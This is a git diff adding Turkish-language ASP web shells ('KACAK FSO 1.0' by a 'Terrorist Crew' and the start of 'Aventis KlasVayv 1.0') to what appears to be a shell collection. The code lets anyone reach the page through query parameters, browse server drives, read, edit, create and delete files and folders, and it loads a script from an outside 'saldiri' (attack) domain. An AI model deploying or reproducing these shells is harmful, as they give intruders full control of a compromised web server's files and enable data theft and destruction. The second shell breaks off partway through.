+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
+          <td width="64" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=teype%>&nbsp;</font></td>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0">
+          <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
+            <tr>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0"
+          onmouseover="this.style.background='#A0A0A0'"
+          onmouseout="this.style.background='#E0E0E0'"
+          style="CURSOR: hand"
+          
+          >
+          <a href="?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
+          <font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
+            </tr>
+          </table>
+          </td>
+        </tr>
+      </table>
+
+	<%
+	end if
+	end if
+	%>
+<%
+next
+%>
+
+
+
+      </center>
+    </div>
+    <div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
+        <tr>
+          <td width="484" height="4" align="center" bgcolor="#C5C5C5">
+          <span style="font-size: 2pt">&nbsp;</span></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <p>&nbsp;</p>
+    </td>
+  </tr>
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+
+
+
+
+<%
+else
+%>
+
+
+
+
+
+<%
+if request.querystring("kaydet") <> "" then
+set dossisx=server.createobject("scripting.filesystemobject")
+set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
+dosx.write request("duzenx")
+dosx.close
+set dosyax=nothing
+set dossisx=nothing
+
+end if
+%>
+
+
+
+
+<%
+if request.querystring("duzenle") <> "" then
+set dossis=server.createobject("scripting.filesystemobject")
+set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
+sedx = dos.readall
+dos.close
+set dosya=nothing
+set dossis=nothing
+
+set aktifklas=request.querystring("klas")
+%>
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    Kacak©<br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("duzenle"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    <form method="POST" action="?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right">
+    <p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><a href=""><input type="reset" size="16"
+		name="x" value="Vazgeç"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></a></td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+<%
+
+if request.querystring("klas") <> "" then
+aktifklas=Request.querystring("klas")
+if request.querystring("usak") = "1" then
+aktifklas=aktifklas & "\"
+end if
+
+else
+aktifklas=server.mappath("/")
+aktifklas=aktifklas & "\"
+end if
+
+if request.querystring("silklas") <> "" then
+set sis=createobject("scripting.filesystemobject")
+silincekklas=request.querystring("silklas")
+sis.deletefolder(silincekklas)
+set sis=nothing
+'response.write(sil & "  Silindi")
+end if
+
+if request.querystring("sildos") <> "" then
+silincekdos=request.querystring("sildos")
+set dosx=createobject("scripting.filesystemobject")
+set dos=dosx.getfile(silincekdos)
+dos.delete
+set dos=nothing
+set dosyasis=nothing
+end if
+
+
+
+
+select case aktifklas
+case "C:" aktifklas="C:\"
+case "D:" aktifklas="D:\"
+case "E:" aktifklas="E:\"
+case "F:" aktifklas="F:\"
+case "G:" aktifklas="G:\"
+case "H:" aktifklas="H:\"
+case "I:" aktifklas="I:\"
+case "J:" aktifklas="J:\"
+case "K:" aktifklas="K:\"
+end select
+
+
+
+if aktifklas=("C:") then aktifklas=("C:\")
+
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set klasor = FS.GetFolder(aktifklas)
+Set altklasorler = klasor.SubFolders
+Set dosyalar = klasor.files
+%>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    Kacak ©<br><br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(aktifklas)%></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+                <a href="?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+                
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a href="?suruculer=1" style="text-decoration: none">
+        <font color="#9F9F9F">Sürücüler</font></a></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+
+			
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adý</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
+  </tr>
+</table>
+
+
+
+<% For each oge in altklasorler %> 
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%>&nbsp;</font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+			    
+
+<% For each oge in dosyalar %> 
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%> </font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( <%=Round(oge.size/1024,1)%> KB )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+
+
+
+<%
+if aktifklas=("C:\") then aktifklas=("C:")
+%>
+
+
+<%
+end if
+%>
+
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+<%
+end if
+%>
+<SCRIPT SRC=http://www.saldiri.org/summer/ciz.js></SCRIPT>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/ASP/klasvayv.asp.txt b/xakep-shells/ASP/klasvayv.asp.txt
new file mode 100644
index 0000000..da5866b
--- /dev/null
+++ b/xakep-shells/ASP/klasvayv.asp.txt
@@ -0,0 +1,901 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Aventis KlasVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
+
+<script language="JavaScript">
+<!--
+function MM_openBrWindow(theURL,winName,features) { //v2.0
+  window.open(theURL,winName,features);
+}
+//-->
+</script>
+
+<%
+if request.querystring("usklas") = "1" then
+on error resume next
+es=request.querystring("klas")
+diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
+
+Select case es
+case "C:" diez="C:"
+case "D:" diez="D:"
+end select
+
+
+
+
+%>
+
+
+
+
+
+<body topmargin="0" leftmargin="0"
+onLoad="location.href='klasvayv.asp?klas=<%=diez%>&usak=1'">
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("dosyakaydet") <> "" then
+set kaydospos=createobject("scripting.filesystemobject")
+set	kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
+set kaydoses=nothing
+set kaydospos=nothing
+set kaydospos=createobject("scripting.filesystemobject")
+set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
+kaydoses.write request("duzenx")
+set kaydoses=nothing
+set kaydospos=nothing
+end if
+%>
+
+
+
+
+
+<%
+if request.querystring("yenidosya") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("yenidosya"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#B7B7B7">
+    <form method="POST" action="klasvayv.asp?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
+<p align="center"><b><font size="1" face="Verdana">
+<br>
+Dosya Adý : <br>
+                </font>
+	</b><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="97" maxlength="32"
+                name="dosadi" value="Dosya Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
+<br>
+                </font>
+	<b><font size="1" face="Verdana">
+Ýçerik :&nbsp; <br>
+                </font>
+	<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluþtur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right" bgcolor="#000000">
+    <p align="center">
+	&nbsp;</td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+
+
+
+
+
+<%
+if request.querystring("klasorac") <> "" then
+
+set doses=createobject("scripting.filesystemobject")
+set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
+set es=nothing
+set doses=nothing
+
+
+end if
+%>
+
+<%
+if request.querystring("klasac") <> "" then
+
+set aktifklas=request.querystring("aktifklas")
+
+
+%>
+    <td width="65" bgcolor="#000000" height="76">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Alan</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=aktifklas%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#C5C5C5" height="134">
+    <form method="POST" action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
+<p align="center"><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx" value="Klasör Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">&nbsp;&nbsp;
+<br>
+<br>
+<br>
+                </font>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluþtur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("suruculer") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
